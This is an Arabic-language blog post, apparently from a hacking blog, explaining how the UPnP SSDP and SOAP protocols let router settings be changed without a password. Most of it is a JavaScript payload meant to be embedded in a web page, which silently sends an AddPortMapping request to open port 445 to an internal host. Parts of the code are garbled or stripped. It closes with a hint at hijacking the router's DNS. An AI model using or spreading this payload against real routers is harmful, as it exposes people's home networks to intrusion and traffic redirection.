vendredi 18 octobre 2013

بروتوكول "UPNP" يسهل عملية اختراق الروتر و ما خلفه من اجهزة

Hack-Router


السلام عليكم و رحمة الله تعالى


اليوم سنتكلم عب بروتوكول خطيييير في الروتر يمكن قرصان المعلوميات من اختراق الروتر و كل ما خلفة
هده الخاصية تسمى 

UPNP: Universal Plug and Play

هي خاصيه في اجهزه التوجيه تعمل على بروتوكولات مبسطه لربط الاجهزه مع بعض في الشبكات المعقده
لدى هده التقنية خاصيتان مهمتان - SSDP :Simple Service Discovery Protocol
 وهو بروتوكول يمثل الطريقه المستخدمه في الكشف عن الاجهزه التي تدعم هذة التقنية

و

-SOAP :Simple Object Access Protocol
وهو اخطر بروتوكول حيث يستخدم لارسال الاوامر وتنفيذها على الروتر ونقدر نقول عليه بروتوكول التحكم

الآن ساوضح لكم خطورة هده التقنية , فكما تعلمون ادا اردت تغيير اعدادات الروتر فستحتلج لكلمة السر
لكن هدا البروتوكول يخول الدخول لاعدادات الروتر دون استعمال اي كلمة سر و هده بالدات هي الثغرة الامنية التي نحن بصددها عند تفعيل "UPNP"
.................................................. ....

هدا الكود يمكن تلغيمه في صفحة هتمل ليقوم
 بفتح بورت 445 للاي بي 192.168.1.64

var req;
var url="/upnp/control/igd/wanpppcInternet";

function loadXMLDoc(url) {
req = false;
// branch for native XMLHttpRequest object
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
try {
req = new XMLHttpRequest();
} catch(e) {
req = false;
}
// branch for IE/Windows ActiveX version
} else if(window.ActiveXObject) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP");
} catch(e) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
req = false;
}
}
}
if(req) {
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader('SOAPAction', '"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"');

req.send('1337TCP445
192.168.1.641EVILFORWARDRULE0');
}
}

function processReqChange() {
// only if req shows "loaded"
if (req.readyState == 4) {
// only if "OK"
if (req.status == 200) {
// ...processing statements go here...
//********************(req.response****);
} else {
********************("There was a problem retrieving the XML data:\n" + req.status****);
}
}
}


loadXMLDoc(url);

.............................................................

 بالامر التالي"DNS"و يمكن ايضا اختراق روتر و التلاعب بسيرفر 

public void setDNSServer(String newDNSServers)

اراكم في تدوينة جديدة متابعي الكرام على العالم الالكتروني






0 commentaires:

Enregistrer un commentaire